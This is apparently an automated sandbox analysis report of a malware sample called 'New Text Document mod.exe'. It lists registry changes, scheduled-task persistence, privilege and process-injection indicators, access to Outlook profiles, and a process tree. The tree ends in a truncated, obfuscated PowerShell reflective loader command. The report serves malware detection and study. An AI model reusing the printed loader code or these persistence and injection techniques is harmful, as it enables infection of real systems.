\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = f3021f007902d5dfa3236b02040000000000670200003153505305d5cdd59c2e1b10939708002b2cf9aeb301000012000000004100750074006f004c006900730074000000420000001e000000700072006f0070003400320039003400390036003700320039003500000000006a010000aea54e38e1ad8a4e8a9b7bea78fff1e90600008000000000010000000200008001000000010000000200000020000000000000007a0014001f44471a0359723fa74489c55595fe6b30ee200000001a00eebbfe23000010003accbfb42cdb4c42b0297fe99a87c641000044003100000000002d5ad58d10006100340009000400efbe2d5ab18d2d5ad58d2e000000ed5a0200000006000000000000000000000000000000e65924016100000010000000000000000000000000000000000000000000000001000000010000800100000004006900740065006d00000000000000000000000000000000000000000000000000000000000000000000000000000000001e1ade7f318ba54993b86be14cfa4943ffffffffffffffffffffffff00000000010000001300530065006100720063006800200052006500730075006c0074007300200069006e00200061000000000000000000000000000000000000000000000000000000000000003900000024000000004100750074006f006c0069007300740043006100630068006500540069006d0065000000140000006058fd1a1e0000005f00000022000000004100750074006f006c00690073007400430061006300680065004b006500790000001f00000015000000530065006100720063006800200052006500730075006c0074007300200069006e002000610030000000000000000000000000000000741a595e96dfd3488d671733bcee28ba671b730433d90a4590e64acd2e9408fe2a0000001300efbe00000020000000000000000000000000000000000000000000000000010000009f022a0000001900efbe1e1ade7f318ba54993b86be14cfa49436f73bebdf5342948abe8b550e65146c49f020000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\Sort = 0000000000000000000000000000000003000000901c6949177e1a10a91c08002b2ecda903000000ffffffff30f125b7ef471a10a5f102608c9eebac0e000000ffffffff30f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000ed30bdda43008947a7f8d013a47366226400000078000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000090000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ New Text Document mod.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000000000000030000000200000001000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "3" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000004000000030000000200000001000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\NodeSlot = "9" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 8160 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8444 SCHTASKS.exe 8824 schtasks.exe 3428 schtasks.exe 4012 schtasks.exe 412 schtasks.exe 5140 schtasks.exe 2200 schtasks.exe 7380 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2992 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2528 gem1.exe 2528 gem1.exe 3340 build.exe 3340 build.exe 3340 build.exe 3136 chrome.exe 3136 chrome.exe 5128 gem2.exe 5268 powershell.exe 5268 powershell.exe 5268 powershell.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 5660 dialer.exe 5660 dialer.exe 5128 gem2.exe 5128 gem2.exe 5128 gem2.exe 6104 Lightshot.exe 2156 powershell.exe 2156 powershell.exe 5660 dialer.exe 5660 dialer.exe 2156 powershell.exe 5660 dialer.exe 5660 dialer.exe 2156 powershell.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 2156 powershell.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 2156 powershell.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe 5660 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 1132 7zFM.exe 3408 chrome.exe 3368 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 1132 7zFM.exe Token: 35 1132 7zFM.exe Token: SeSecurityPrivilege 1132 7zFM.exe Token: SeDebugPrivilege 4628 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 4104 ._cache_Synaptics.exe Token: SeDebugPrivilege 3956 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 3352 voidware_loader.exe Token: SeDebugPrivilege 1096 DirectX111.exe Token: SeDebugPrivilege 2528 gem1.exe Token: SeImpersonatePrivilege 2528 gem1.exe Token: SeDebugPrivilege 3424 gem1.exe Token: SeImpersonatePrivilege 3424 gem1.exe Token: SeDebugPrivilege 764 ._cache_New Text Document mod.exe Token: SeDebugPrivilege 3340 build.exe Token: SeDebugPrivilege 2860 voidware_loader.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeShutdownPrivilege 3136 chrome.exe Token: SeCreatePagefilePrivilege 3136 chrome.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeDebugPrivilege 5660 dialer.exe Token: SeShutdownPrivilege 5616 powercfg.exe Token: SeCreatePagefilePrivilege 5616 powercfg.exe Token: SeShutdownPrivilege 5664 powercfg.exe Token: SeCreatePagefilePrivilege 5664 powercfg.exe Token: SeShutdownPrivilege 5624 powercfg.exe -
Suspicious use of FindShellTrayWindow 28 IoCs
pid Process 1132 7zFM.exe 1132 7zFM.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe 3136 chrome.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 2992 EXCEL.EXE 3408 chrome.exe 6976 Conhost.exe 3408 chrome.exe 3408 chrome.exe 3408 chrome.exe 3368 Explorer.EXE 3368 Explorer.EXE 3368 Explorer.EXE 3368 Explorer.EXE 2136 Conhost.exe 3408 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1988 wrote to memory of 4628 1988 New Text Document mod.exe 81 PID 1988 wrote to memory of 4628 1988 New Text Document mod.exe 81 PID 1988 wrote to memory of 2888 1988 New Text Document mod.exe 83 PID 1988 wrote to memory of 2888 1988 New Text Document mod.exe 83 PID 1988 wrote to memory of 2888 1988 New Text Document mod.exe 83 PID 2888 wrote to memory of 4104 2888 Synaptics.exe 84 PID 2888 wrote to memory of 4104 2888 Synaptics.exe 84 PID 1824 wrote to memory of 3956 1824 New Text Document mod.exe 90 PID 1824 wrote to memory of 3956 1824 New Text Document mod.exe 90 PID 4628 wrote to memory of 3352 4628 ._cache_New Text Document mod.exe 94 PID 4628 wrote to memory of 3352 4628 ._cache_New Text Document mod.exe 94 PID 3352 wrote to memory of 4012 3352 voidware_loader.exe 95 PID 3352 wrote to memory of 4012 3352 voidware_loader.exe 95 PID 3352 wrote to memory of 1096 3352 voidware_loader.exe 97 PID 3352 wrote to memory of 1096 3352 voidware_loader.exe 97 PID 4628 wrote to memory of 3340 4628 ._cache_New Text Document mod.exe 98 PID 4628 wrote to memory of 3340 4628 ._cache_New Text Document mod.exe 98 PID 4628 wrote to memory of 3340 4628 ._cache_New Text Document mod.exe 98 PID 1096 wrote to memory of 412 1096 DirectX111.exe 100 PID 1096 wrote to memory of 412 1096 DirectX111.exe 100 PID 4628 wrote to memory of 4656 4628 ._cache_New Text Document mod.exe 102 PID 4628 wrote to memory of 4656 4628 ._cache_New Text Document mod.exe 102 PID 4628 wrote to memory of 4656 4628 ._cache_New Text Document mod.exe 102 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 3424 4656 gem1.exe 104 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4656 wrote to memory of 2528 4656 gem1.exe 105 PID 4676 wrote to memory of 764 4676 New Text Document mod.exe 110 PID 4676 wrote to memory of 764 4676 New Text Document mod.exe 110 PID 3136 wrote to memory of 2800 3136 chrome.exe 113 PID 3136 wrote to memory of 2800 3136 chrome.exe 113 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 PID 3136 wrote to memory of 3196 3136 chrome.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 gem1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:432
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Modifies data under HKEY_USERS
PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1156
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pwmKIUDswknw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hviZgIVRhSjoif,[Parameter(Position=1)][Type]$lwpZDHGGmS)$WspJADuXWwb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+'D'+'e'+''+'l'+''+'e'+'gate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+'o'+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$WspJADuXWwb.DefineConstructor(''+'R'+''+[Char](84)+''+[